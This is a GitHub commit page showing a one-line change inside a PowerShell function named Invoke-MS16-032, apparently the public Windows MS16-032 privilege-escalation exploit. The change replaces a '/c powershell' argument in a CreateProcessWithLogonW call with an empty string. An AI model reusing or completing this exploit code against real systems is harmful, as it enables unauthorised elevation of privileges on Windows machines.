Skip to content

Commit 5877d7a

Browse files
authored
Update test.txt
1 parent fd712b3 commit 5877d7a

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

test.txt

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -330,7 +330,7 @@ function Invoke-MS16-032 {
330330
# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
331331
$CallResult = [Advapi32]::CreateProcessWithLogonW(
332332
"user", "domain", "pass",
333-
0x00000002, "C:\Windows\System32\cmd.exe", "/c powershell",
333+
0x00000002, "C:\Windows\System32\cmd.exe", "",
334334
0x00000004, $null, $GetCurrentPath,
335335
[ref]$StartupInfo, [ref]$ProcessInfo)
336336

0 commit comments

Comments
 (0)